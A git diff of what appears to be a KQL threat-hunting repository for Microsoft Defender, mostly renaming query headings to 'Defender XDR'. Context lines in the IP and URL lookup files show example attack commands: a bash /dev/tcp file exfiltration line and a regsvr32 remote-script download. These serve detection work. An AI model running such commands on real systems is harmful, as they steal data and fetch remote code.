```KQL let Threshold = 20; let BinSize = 1d; @@ -25,4 +25,4 @@ CloudAuditEvents | where ActionType == "CloudAuditEventDelete" | summarize TotalActions = count(), arg_max(Timestamp, *) by bin(Timestamp, BinSize), Account, DataSource | where TotalActions > Threshold -``` \ No newline at end of file +``` diff --git a/DFIR/Defender For Endpoint/MDE - AllProcessesCreatedByMaliciousFile.md b/DFIR/Defender For Endpoint/MDE - AllProcessesCreatedByMaliciousFile.md index fdf5d54..620d760 100644 --- a/DFIR/Defender For Endpoint/MDE - AllProcessesCreatedByMaliciousFile.md +++ b/DFIR/Defender For Endpoint/MDE - AllProcessesCreatedByMaliciousFile.md @@ -1,6 +1,6 @@ # Find all the processes a file has created and the associated FileNames, FileLocations and SHA1 hashes that the file has had. ---- -### Defender For Endpoint +### Defender XDR ``` // For the best results use SHA1 
diff --git a/DFIR/Defender For Endpoint/MDE - Antivirus-Detections-by-Compromised-Device.md b/DFIR/Defender For Endpoint/MDE - Antivirus-Detections-by-Compromised-Device.md index 6657bba..ee9cd65 100644 --- a/DFIR/Defender For Endpoint/MDE - Antivirus-Detections-by-Compromised-Device.md +++ b/DFIR/Defender For Endpoint/MDE - Antivirus-Detections-by-Compromised-Device.md @@ -1,6 +1,6 @@ # Find the DFE Antivirus events on compromised devices. FileInfo is stored in JSON format. ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevices = dynamic (["laptop1", "server2"]); diff --git a/DFIR/Defender For Endpoint/MDE - BrowserLaunchedToOpenUrlByCompromisedDevice.md b/DFIR/Defender For Endpoint/MDE - BrowserLaunchedToOpenUrlByCompromisedDevice.md index f29b049..25a005a 100644 --- a/DFIR/Defender For Endpoint/MDE - BrowserLaunchedToOpenUrlByCompromisedDevice.md +++ b/DFIR/Defender For Endpoint/MDE - BrowserLaunchedToOpenUrlByCompromisedDevice.md @@ -1,6 +1,6 @@ # Find all the activities that launched a browser to open a URL from a compromised device. -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop.contoso.com"; diff --git a/DFIR/Defender For Endpoint/MDE - Connections-Made-By-Office-Compromised-Device.md b/DFIR/Defender For Endpoint/MDE - Connections-Made-By-Office-Compromised-Device.md index 05e8a60..bd198bb 100644 --- a/DFIR/Defender For Endpoint/MDE - Connections-Made-By-Office-Compromised-Device.md +++ b/DFIR/Defender For Endpoint/MDE - Connections-Made-By-Office-Compromised-Device.md @@ -1,6 +1,6 @@ # Find all the connections that have been made by Office from a compromised device. ---- -### Defender For Endpoint +### Defender XDR ``` let ConnectionsMadeByOfficeRegKey = @'\SOFTWARE\Microsoft\Office\16.0\Common\Internet\Server Cache'; diff --git a/DFIR/Defender For Endpoint/MDE - FileEnrichmentOnSuspiciousFile.md b/DFIR/Defender For Endpoint/MDE - FileEnrichmentOnSuspiciousFile.md index de7d44e..0a51b61 100644 
--- a/DFIR/Defender For Endpoint/MDE - FileEnrichmentOnSuspiciousFile.md +++ b/DFIR/Defender For Endpoint/MDE - FileEnrichmentOnSuspiciousFile.md @@ -1,6 +1,6 @@ # File Enrichment on Suspicious File ---- -### Defender For Endpoint +### Defender XDR ``` let SuspiciousDownloadName = 'GoogleUpdateSetup.exe'; diff --git a/DFIR/Defender For Endpoint/MDE - IPLookup.md b/DFIR/Defender For Endpoint/MDE - IPLookup.md index 421e9b9..b7da45a 100644 --- a/DFIR/Defender For Endpoint/MDE - IPLookup.md +++ b/DFIR/Defender For Endpoint/MDE - IPLookup.md @@ -14,7 +14,7 @@ bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' #### References - https://lolbas-project.github.io/lolbas/Binaries/Rundll32/ - https://lolbas-project.github.io/lolbas/Binaries/Bash/ -## Defender For Endpoint +## Defender XDR ``` // Set the IP address you are trying to lookup. let LookupIP = "127.0.0.1"; diff --git a/DFIR/Defender For Endpoint/MDE - InboundConnectionsCompromisedDevice.md b/DFIR/Defender For Endpoint/MDE - InboundConnectionsCompromisedDevice.md index 4edb634..68730e4 100644 --- a/DFIR/Defender For Endpoint/MDE - InboundConnectionsCompromisedDevice.md +++ b/DFIR/Defender For Endpoint/MDE - InboundConnectionsCompromisedDevice.md @@ -8,7 +8,7 @@ This query can be used to get a quick overview of all the inbound connections th #### References - https://www.microsoft.com/en-us/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/ -## Defender For Endpoint +## Defender XDR ``` // Add the device you are investigating in the CompromisedDevice variable let CompromisedDevice = "test.domain.tld"; diff --git a/DFIR/Defender For Endpoint/MDE - InternalConnectionsMadeByCompromisedDevice.md b/DFIR/Defender For Endpoint/MDE - InternalConnectionsMadeByCompromisedDevice.md index 4f0ec8a..89e8024 100644 --- a/DFIR/Defender For Endpoint/MDE - InternalConnectionsMadeByCompromisedDevice.md 
+++ b/DFIR/Defender For Endpoint/MDE - InternalConnectionsMadeByCompromisedDevice.md @@ -9,7 +9,7 @@ This query will most likely, depending on the setup of your organization always This is query is aimed to be part of your inciden triage, to discover or exclude potential lateral movement in an efficient manner. -## Defender For Endpoint +## Defender XDR ``` // Add the device you are investigating in the CompromisedDevice variable let CompromisedDevice = "compromiseddevice"; diff --git a/DFIR/Defender For Endpoint/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md b/DFIR/Defender For Endpoint/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md index 28be11d..11ae887 100644 --- a/DFIR/Defender For Endpoint/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md +++ b/DFIR/Defender For Endpoint/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md @@ -1,6 +1,6 @@ # Find all attachments that have been send from a compromised mailbox and which devices have opened that attachment. ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedMailbox = "test@test.com"; diff --git a/DFIR/Defender For Endpoint/MDE - MostRecentPowershellExecutionsByCompromisedDevice.md b/DFIR/Defender For Endpoint/MDE - MostRecentPowershellExecutionsByCompromisedDevice.md index ba6a358..25f897a 100644 --- a/DFIR/Defender For Endpoint/MDE - MostRecentPowershellExecutionsByCompromisedDevice.md +++ b/DFIR/Defender For Endpoint/MDE - MostRecentPowershellExecutionsByCompromisedDevice.md @@ -1,6 +1,6 @@ # Show the last 100 Powershell executions from a compromised device ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop.contoso.com"; diff --git a/DFIR/Defender For Endpoint/MDE - NetActivities.md b/DFIR/Defender For Endpoint/MDE - NetActivities.md index b52c3e1..0550f1d 100644 --- a/DFIR/Defender For Endpoint/MDE - NetActivities.md +++ b/DFIR/Defender For Endpoint/MDE - NetActivities.md 
@@ -1,6 +1,6 @@ # List all net(1).exe activities on a host ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "azurewin2022"; diff --git a/DFIR/Defender For Endpoint/MDE - Open-SMB-Connections-By-Compromised-Device.md b/DFIR/Defender For Endpoint/MDE - Open-SMB-Connections-By-Compromised-Device.md index 799cbc1..5876f1c 100644 --- a/DFIR/Defender For Endpoint/MDE - Open-SMB-Connections-By-Compromised-Device.md +++ b/DFIR/Defender For Endpoint/MDE - Open-SMB-Connections-By-Compromised-Device.md @@ -1,6 +1,6 @@ # Show all successful SMB connections of a compromised device ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop1"; diff --git a/DFIR/Defender For Endpoint/MDE - Registry-Run-Keys-Forensics.md b/DFIR/Defender For Endpoint/MDE - Registry-Run-Keys-Forensics.md index af8b58f..044f9e5 100644 --- a/DFIR/Defender For Endpoint/MDE - Registry-Run-Keys-Forensics.md +++ b/DFIR/Defender For Endpoint/MDE - Registry-Run-Keys-Forensics.md @@ -1,6 +1,6 @@ # Forensics on Registry Run keys in Windows. Registry Run keys can be used to establish persistence on a device. ---- -### Defender For Endpoint +### Defender XDR ``` let RegistryRunKeys = dynamic diff --git a/DFIR/Defender For Endpoint/MDE - TriggeredASREventsFromCompromisedDevice.md b/DFIR/Defender For Endpoint/MDE - TriggeredASREventsFromCompromisedDevice.md index 984b022..b8debc2 100644 --- a/DFIR/Defender For Endpoint/MDE - TriggeredASREventsFromCompromisedDevice.md +++ b/DFIR/Defender For Endpoint/MDE - TriggeredASREventsFromCompromisedDevice.md @@ -1,6 +1,6 @@ # Find all the ASR events that have triggered from a compromised device -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop1"; diff --git a/DFIR/Defender For Endpoint/MDE - URLLookup.md b/DFIR/Defender For Endpoint/MDE - URLLookup.md index d2472d9..e383543 100644 --- a/DFIR/Defender For Endpoint/MDE - URLLookup.md +++ b/DFIR/Defender For Endpoint/MDE - URLLookup.md 
@@ -19,7 +19,7 @@ cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redca - https://www.bleepingcomputer.com/news/security/windows-10-background-image-tool-can-be-abused-to-download-malware/ - https://lolbas-project.github.io/lolbas/Binaries/Cmd/ -## Defender For Endpoint +## Defender XDR ``` // Set the URL you are trying to lookup. // Lookup in this query is done with a contains, if this results in to many false positives add www. before the rest of the url. diff --git a/DFIR/Defender For Endpoint/MDE - UrlsOpenedWithOutlookFromCompromisedDevice.md b/DFIR/Defender For Endpoint/MDE - UrlsOpenedWithOutlookFromCompromisedDevice.md index cf27400..c769779 100644 --- a/DFIR/Defender For Endpoint/MDE - UrlsOpenedWithOutlookFromCompromisedDevice.md +++ b/DFIR/Defender For Endpoint/MDE - UrlsOpenedWithOutlookFromCompromisedDevice.md @@ -1,6 +1,6 @@ # Find all the activities that launched a browser to open a URL from a compromised device. -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop.contoso.com"; diff --git a/DFIR/Defender For Identity/MDI - ADGroupAdditions.md b/DFIR/Defender For Identity/MDI - ADGroupAdditions.md index fb54b6a..75a8bb9 100644 --- a/DFIR/Defender For Identity/MDI - ADGroupAdditions.md +++ b/DFIR/Defender For Identity/MDI - ADGroupAdditions.md @@ -9,7 +9,7 @@ This query can be used to list all Active Directory group additions. The query u - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-identitydirectoryevents-table?view=o365-worldwide - https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-default-user-accounts -## Defender For Endpoint +## Defender XDR ``` let Groups = dynamic(['Domain Admins', 'GroupName2']); // Add your sensitive groups to this list let SearchWindow = 48h; //Customizable h = hours, d = days 
diff --git a/DFIR/Defender For Identity/MDI - Devices-Accessed-By-Compromised-Device.md b/DFIR/Defender For Identity/MDI - Devices-Accessed-By-Compromised-Device.md index 92a8337..c4bd8da 100644 --- a/DFIR/Defender For Identity/MDI - Devices-Accessed-By-Compromised-Device.md +++ b/DFIR/Defender For Identity/MDI - Devices-Accessed-By-Compromised-Device.md @@ -1,6 +1,6 @@ # Find which devices have been accessed by a compromised device and which protocol was used to connect ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop.contoso.com"; diff --git a/DFIR/Defender For Identity/MDI - LDAPQueriesByCompromisedDevice.md b/DFIR/Defender For Identity/MDI - LDAPQueriesByCompromisedDevice.md index b2c6132..dfb1045 100644 --- a/DFIR/Defender For Identity/MDI - LDAPQueriesByCompromisedDevice.md +++ b/DFIR/Defender For Identity/MDI - LDAPQueriesByCompromisedDevice.md @@ -1,6 +1,6 @@ # Find all the executed LDAP queries from a compromised device -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop1.com"; diff --git a/DFIR/Defender For Identity/MDI - Lateral-Movement-By-Compromised-Accounts.md b/DFIR/Defender For Identity/MDI - Lateral-Movement-By-Compromised-Accounts.md index 0fa298f..00edf68 100644 --- a/DFIR/Defender For Identity/MDI - Lateral-Movement-By-Compromised-Accounts.md +++ b/DFIR/Defender For Identity/MDI - Lateral-Movement-By-Compromised-Accounts.md @@ -1,6 +1,6 @@ # Find which devices have been accessed by a list of compromised accounts and which protocol was used to connect ---- -### Defender For Endpoint +### Defender XDR ``` let ComprimsedUsers = dynamic(['user1', 'user2']); diff --git a/DFIR/Defender For Office/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md b/DFIR/Defender For Office/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md index 28be11d..11ae887 100644 --- a/DFIR/Defender For Office/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md 
+++ b/DFIR/Defender For Office/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md @@ -1,6 +1,6 @@ # Find all attachments that have been send from a compromised mailbox and which devices have opened that attachment. ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedMailbox = "test@test.com"; diff --git a/DFIR/Defender For Office/MDO- FindRelatedMails.md b/DFIR/Defender For Office/MDO- FindRelatedMails.md index d76b30a..4ad42e9 100644 --- a/DFIR/Defender For Office/MDO- FindRelatedMails.md +++ b/DFIR/Defender For Office/MDO- FindRelatedMails.md @@ -8,7 +8,7 @@ The EmailClusterId which can be assigned to a mail is the identifier for the gro #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-emailevents-table?view=o365-worldwide -### Defender For Endpoint +### Defender XDR ``` let MaliciousEmailCluseriId = "3163234347533"; // Input the EmailClusterId here EmailEvents diff --git a/DFIR/Exposure Management/ExposureManagement - DeviceActivities.md b/DFIR/Exposure Management/ExposureManagement - DeviceActivities.md index c3a8877..50f439a 100644 --- a/DFIR/Exposure Management/ExposureManagement - DeviceActivities.md +++ b/DFIR/Exposure Management/ExposureManagement - DeviceActivities.md @@ -9,4 +9,4 @@ ExposureGraphEdges | where SourceNodeName == DeviceName | summarize Total = dcount(TargetNodeName), Details = make_set(TargetNodeName) by EdgeLabel, SourceNodeName | project Source = SourceNodeName, Action = EdgeLabel, Details, Tota -``` \ No newline at end of file +``` diff --git a/DFIR/ExposureManagement - DeviceActivities.md b/DFIR/ExposureManagement - DeviceActivities.md index c3a8877..50f439a 100644 --- a/DFIR/ExposureManagement - DeviceActivities.md +++ b/DFIR/ExposureManagement - DeviceActivities.md 
@@ -9,4 +9,4 @@ ExposureGraphEdges | where SourceNodeName == DeviceName | summarize Total = dcount(TargetNodeName), Details = make_set(TargetNodeName) by EdgeLabel, SourceNodeName | project Source = SourceNodeName, Action = EdgeLabel, Details, Tota -``` \ No newline at end of file +``` diff --git a/DFIR/MDE - AllProcessesCreatedByMaliciousFile.md b/DFIR/MDE - AllProcessesCreatedByMaliciousFile.md index fdf5d54..620d760 100644 --- a/DFIR/MDE - AllProcessesCreatedByMaliciousFile.md +++ b/DFIR/MDE - AllProcessesCreatedByMaliciousFile.md @@ -1,6 +1,6 @@ # Find all the processes a file has created and the associated FileNames, FileLocations and SHA1 hashes that the file has had. ---- -### Defender For Endpoint +### Defender XDR ``` // For the best results use SHA1 diff --git a/DFIR/MDE - Antivirus-Detections-by-Compromised-Device.md b/DFIR/MDE - Antivirus-Detections-by-Compromised-Device.md index 6657bba..ee9cd65 100644 --- a/DFIR/MDE - Antivirus-Detections-by-Compromised-Device.md +++ b/DFIR/MDE - Antivirus-Detections-by-Compromised-Device.md @@ -1,6 +1,6 @@ # Find the DFE Antivirus events on compromised devices. FileInfo is stored in JSON format. ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevices = dynamic (["laptop1", "server2"]); diff --git a/DFIR/MDE - BrowserLaunchedToOpenUrlByCompromisedDevice.md b/DFIR/MDE - BrowserLaunchedToOpenUrlByCompromisedDevice.md index f29b049..25a005a 100644 --- a/DFIR/MDE - BrowserLaunchedToOpenUrlByCompromisedDevice.md +++ b/DFIR/MDE - BrowserLaunchedToOpenUrlByCompromisedDevice.md @@ -1,6 +1,6 @@ # Find all the activities that launched a browser to open a URL from a compromised device. -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop.contoso.com"; diff --git a/DFIR/MDE - Connections-Made-By-Office-Compromised-Device.md b/DFIR/MDE - Connections-Made-By-Office-Compromised-Device.md index 05e8a60..bd198bb 100644 --- a/DFIR/MDE - Connections-Made-By-Office-Compromised-Device.md 
+++ b/DFIR/MDE - Connections-Made-By-Office-Compromised-Device.md @@ -1,6 +1,6 @@ # Find all the connections that have been made by Office from a compromised device. ---- -### Defender For Endpoint +### Defender XDR ``` let ConnectionsMadeByOfficeRegKey = @'\SOFTWARE\Microsoft\Office\16.0\Common\Internet\Server Cache'; diff --git a/DFIR/MDE - FileEnrichmentOnSuspiciousFile.md b/DFIR/MDE - FileEnrichmentOnSuspiciousFile.md index de7d44e..0a51b61 100644 --- a/DFIR/MDE - FileEnrichmentOnSuspiciousFile.md +++ b/DFIR/MDE - FileEnrichmentOnSuspiciousFile.md @@ -1,6 +1,6 @@ # File Enrichment on Suspicious File ---- -### Defender For Endpoint +### Defender XDR ``` let SuspiciousDownloadName = 'GoogleUpdateSetup.exe'; diff --git a/DFIR/MDE - IPLookup.md b/DFIR/MDE - IPLookup.md index 421e9b9..b7da45a 100644 --- a/DFIR/MDE - IPLookup.md +++ b/DFIR/MDE - IPLookup.md @@ -14,7 +14,7 @@ bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' #### References - https://lolbas-project.github.io/lolbas/Binaries/Rundll32/ - https://lolbas-project.github.io/lolbas/Binaries/Bash/ -## Defender For Endpoint +## Defender XDR ``` // Set the IP address you are trying to lookup. let LookupIP = "127.0.0.1"; diff --git a/DFIR/MDE - InboundConnectionsCompromisedDevice.md b/DFIR/MDE - InboundConnectionsCompromisedDevice.md index 4edb634..68730e4 100644 --- a/DFIR/MDE - InboundConnectionsCompromisedDevice.md +++ b/DFIR/MDE - InboundConnectionsCompromisedDevice.md @@ -8,7 +8,7 @@ This query can be used to get a quick overview of all the inbound connections th #### References - https://www.microsoft.com/en-us/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/ -## Defender For Endpoint +## Defender XDR ``` // Add the device you are investigating in the CompromisedDevice variable let CompromisedDevice = "test.domain.tld"; 
diff --git a/DFIR/MDE - InternalConnectionsMadeByCompromisedDevice.md b/DFIR/MDE - InternalConnectionsMadeByCompromisedDevice.md index 4f0ec8a..89e8024 100644 --- a/DFIR/MDE - InternalConnectionsMadeByCompromisedDevice.md +++ b/DFIR/MDE - InternalConnectionsMadeByCompromisedDevice.md @@ -9,7 +9,7 @@ This query will most likely, depending on the setup of your organization always This is query is aimed to be part of your inciden triage, to discover or exclude potential lateral movement in an efficient manner. -## Defender For Endpoint +## Defender XDR ``` // Add the device you are investigating in the CompromisedDevice variable let CompromisedDevice = "compromiseddevice"; diff --git a/DFIR/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md b/DFIR/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md index 28be11d..11ae887 100644 --- a/DFIR/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md +++ b/DFIR/MDE - MD365-EmailAttachmentsSendFromCompromisedMailbox.md @@ -1,6 +1,6 @@ # Find all attachments that have been send from a compromised mailbox and which devices have opened that attachment. ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedMailbox = "test@test.com"; diff --git a/DFIR/MDE - MostRecentPowershellExecutionsByCompromisedDevice.md b/DFIR/MDE - MostRecentPowershellExecutionsByCompromisedDevice.md index ba6a358..25f897a 100644 --- a/DFIR/MDE - MostRecentPowershellExecutionsByCompromisedDevice.md +++ b/DFIR/MDE - MostRecentPowershellExecutionsByCompromisedDevice.md @@ -1,6 +1,6 @@ # Show the last 100 Powershell executions from a compromised device ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop.contoso.com"; diff --git a/DFIR/MDE - NetActivities.md b/DFIR/MDE - NetActivities.md index b52c3e1..0550f1d 100644 --- a/DFIR/MDE - NetActivities.md +++ b/DFIR/MDE - NetActivities.md 
@@ -1,6 +1,6 @@ # List all net(1).exe activities on a host ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "azurewin2022"; diff --git a/DFIR/MDE - Open-SMB-Connections-By-Compromised-Device.md b/DFIR/MDE - Open-SMB-Connections-By-Compromised-Device.md index 799cbc1..5876f1c 100644 --- a/DFIR/MDE - Open-SMB-Connections-By-Compromised-Device.md +++ b/DFIR/MDE - Open-SMB-Connections-By-Compromised-Device.md @@ -1,6 +1,6 @@ # Show all successful SMB connections of a compromised device ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop1"; diff --git a/DFIR/MDE - Registry-Run-Keys-Forensics.md b/DFIR/MDE - Registry-Run-Keys-Forensics.md index af8b58f..044f9e5 100644 --- a/DFIR/MDE - Registry-Run-Keys-Forensics.md +++ b/DFIR/MDE - Registry-Run-Keys-Forensics.md @@ -1,6 +1,6 @@ # Forensics on Registry Run keys in Windows. Registry Run keys can be used to establish persistence on a device. ---- -### Defender For Endpoint +### Defender XDR ``` let RegistryRunKeys = dynamic diff --git a/DFIR/MDE - TriggeredASREventsFromCompromisedDevice.md b/DFIR/MDE - TriggeredASREventsFromCompromisedDevice.md index 984b022..b8debc2 100644 --- a/DFIR/MDE - TriggeredASREventsFromCompromisedDevice.md +++ b/DFIR/MDE - TriggeredASREventsFromCompromisedDevice.md @@ -1,6 +1,6 @@ # Find all the ASR events that have triggered from a compromised device -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop1"; diff --git a/DFIR/MDE - URLLookup.md b/DFIR/MDE - URLLookup.md index d2472d9..e383543 100644 --- a/DFIR/MDE - URLLookup.md +++ b/DFIR/MDE - URLLookup.md 
@@ -19,7 +19,7 @@ cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redca - https://www.bleepingcomputer.com/news/security/windows-10-background-image-tool-can-be-abused-to-download-malware/ - https://lolbas-project.github.io/lolbas/Binaries/Cmd/ -## Defender For Endpoint +## Defender XDR ``` // Set the URL you are trying to lookup. // Lookup in this query is done with a contains, if this results in to many false positives add www. before the rest of the url. diff --git a/DFIR/MDE - UrlsOpenedWithOutlookFromCompromisedDevice.md b/DFIR/MDE - UrlsOpenedWithOutlookFromCompromisedDevice.md index cf27400..c769779 100644 --- a/DFIR/MDE - UrlsOpenedWithOutlookFromCompromisedDevice.md +++ b/DFIR/MDE - UrlsOpenedWithOutlookFromCompromisedDevice.md @@ -1,6 +1,6 @@ # Find all the activities that launched a browser to open a URL from a compromised device. -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop.contoso.com"; diff --git a/DFIR/MDI - ADGroupAdditions.md b/DFIR/MDI - ADGroupAdditions.md index fb54b6a..75a8bb9 100644 --- a/DFIR/MDI - ADGroupAdditions.md +++ b/DFIR/MDI - ADGroupAdditions.md @@ -9,7 +9,7 @@ This query can be used to list all Active Directory group additions. The query u - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-identitydirectoryevents-table?view=o365-worldwide - https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-default-user-accounts -## Defender For Endpoint +## Defender XDR ``` let Groups = dynamic(['Domain Admins', 'GroupName2']); // Add your sensitive groups to this list let SearchWindow = 48h; //Customizable h = hours, d = days diff --git a/DFIR/MDI - Devices-Accessed-By-Compromised-Device.md b/DFIR/MDI - Devices-Accessed-By-Compromised-Device.md index 92a8337..c4bd8da 100644 --- a/DFIR/MDI - Devices-Accessed-By-Compromised-Device.md +++ b/DFIR/MDI - Devices-Accessed-By-Compromised-Device.md 
@@ -1,6 +1,6 @@ # Find which devices have been accessed by a compromised device and which protocol was used to connect ---- -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop.contoso.com"; diff --git a/DFIR/MDI - LDAPQueriesByCompromisedDevice.md b/DFIR/MDI - LDAPQueriesByCompromisedDevice.md index b2c6132..dfb1045 100644 --- a/DFIR/MDI - LDAPQueriesByCompromisedDevice.md +++ b/DFIR/MDI - LDAPQueriesByCompromisedDevice.md @@ -1,6 +1,6 @@ # Find all the executed LDAP queries from a compromised device -### Defender For Endpoint +### Defender XDR ``` let CompromisedDevice = "laptop1.com"; diff --git a/DFIR/MDI - Lateral-Movement-By-Compromised-Accounts.md b/DFIR/MDI - Lateral-Movement-By-Compromised-Accounts.md index 0fa298f..00edf68 100644 --- a/DFIR/MDI - Lateral-Movement-By-Compromised-Accounts.md +++ b/DFIR/MDI - Lateral-Movement-By-Compromised-Accounts.md @@ -1,6 +1,6 @@ # Find which devices have been accessed by a list of compromised accounts and which protocol was used to connect ---- -### Defender For Endpoint +### Defender XDR ``` let ComprimsedUsers = dynamic(['user1', 'user2']); diff --git a/DFIR/MDO- FindRelatedMails.md b/DFIR/MDO- FindRelatedMails.md index d76b30a..4ad42e9 100644 --- a/DFIR/MDO- FindRelatedMails.md +++ b/DFIR/MDO- FindRelatedMails.md @@ -8,7 +8,7 @@ The EmailClusterId which can be assigned to a mail is the identifier for the gro #### References - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-emailevents-table?view=o365-worldwide -### Defender For Endpoint +### Defender XDR ``` let MaliciousEmailCluseriId = "3163234347533"; // Input the EmailClusterId here EmailEvents diff --git a/Defender For Cloud Apps/ATPDetectionEvents.md b/Defender For Cloud Apps/ATPDetectionEvents.md index 42a2abe..11d58d0 100644 --- a/Defender For Cloud Apps/ATPDetectionEvents.md +++ b/Defender For Cloud Apps/ATPDetectionEvents.md 
@@ -1,6 +1,6 @@ # ATP Detection events triggered -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/AccountsWithMostImpersonatedActions.md b/Defender For Cloud Apps/AccountsWithMostImpersonatedActions.md index 41f2989..3e214b8 100644 --- a/Defender For Cloud Apps/AccountsWithMostImpersonatedActions.md +++ b/Defender For Cloud Apps/AccountsWithMostImpersonatedActions.md @@ -1,6 +1,6 @@ # List the top 100 accounts that have performed the most impersonated actions -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/AnonymousProxyEvents.md b/Defender For Cloud Apps/AnonymousProxyEvents.md index b22193d..e6aaa0a 100644 --- a/Defender For Cloud Apps/AnonymousProxyEvents.md +++ b/Defender For Cloud Apps/AnonymousProxyEvents.md @@ -19,7 +19,7 @@ A attacker has taken control over an account and tries to mask its source. #### References - https://support.apple.com/en-us/HT212614 -## Defender For Endpoint +## Defender XDR ``` CloudAppEvents | where IsAnonymousProxy == 1 diff --git a/Defender For Cloud Apps/DefenseEvasionAlerts.md b/Defender For Cloud Apps/DefenseEvasionAlerts.md index 5c53efc..0727286 100644 --- a/Defender For Cloud Apps/DefenseEvasionAlerts.md +++ b/Defender For Cloud Apps/DefenseEvasionAlerts.md @@ -1,6 +1,6 @@ # Defense Evasion Alerts Generated by Defender For Endpoint -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/ExternalAdminActivities.md b/Defender For Cloud Apps/ExternalAdminActivities.md index 44375ce..ed95777 100644 --- a/Defender For Cloud Apps/ExternalAdminActivities.md +++ b/Defender For Cloud Apps/ExternalAdminActivities.md @@ -1,6 +1,6 @@ # List the external admin activities -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/FileContainingMalwareDetected.md b/Defender For Cloud Apps/FileContainingMalwareDetected.md index 25a6ca7..778a111 100644 
--- a/Defender For Cloud Apps/FileContainingMalwareDetected.md +++ b/Defender For Cloud Apps/FileContainingMalwareDetected.md @@ -1,6 +1,6 @@ # File that contains malware detected by Defender For Cloud Apps -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents diff --git a/Defender For Cloud Apps/HardUserDelete.md b/Defender For Cloud Apps/HardUserDelete.md index 117d294..49935bd 100644 --- a/Defender For Cloud Apps/HardUserDelete.md +++ b/Defender For Cloud Apps/HardUserDelete.md @@ -1,6 +1,6 @@ # Hunt for activities where Hard Delete user was performed ---- -### Defender For Endpoint +### Defender XDR ``` CloudAppEvents @@ -26,4 +26,4 @@ CloudAppEvents InitiatingUser = AccountDisplayName, DeletedUser -``` \ No newline at end of file +``` diff --git a/Defender For Cloud Apps/MITREBehaviors.md b/Defender For Cloud Apps/MITREBehaviors.md index 00e251c..ae9dbb2 100644 --- a/Defender For Cloud Apps/MITREBehaviors.md +++ b/Defender For Cloud Apps/MITREBehaviors.md @@ -11,7 +11,7 @@ An actor has taken over an account and performes multiple techniques to reach hi - https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-behaviorinfo-table?view=o365-worldwide - https://learn.microsoft.com/en-us/defender-cloud-apps/behaviors -## Defender For Endpoint +## Defender XDR ``` let AlertThreshold = 3; BehaviorInfo @@ -48,4 +48,4 @@ BehaviorInfo | project-away BehaviourIds, AccountObjectId1, AdditionalFields1, ActionType1, BehaviorId1, Categories1, DataSources1, TimeGenerated | project-reorder AccountObjectId, TotalTechniques, UniqueTechniques, Techniques, Categories, Description, DetectionSource | sort by AccountObjectId -``` \ No newline at end of file +``` diff --git a/Defender For Cloud Apps/MaliciousEmailDeliveredInMailbox.md b/Defender For Cloud Apps/MaliciousEmailDeliveredInMailbox.md index 59e1c0d..a9ae1d2 100644 --- a/Defender For Cloud Apps/MaliciousEmailDeliveredInMailbox.md 
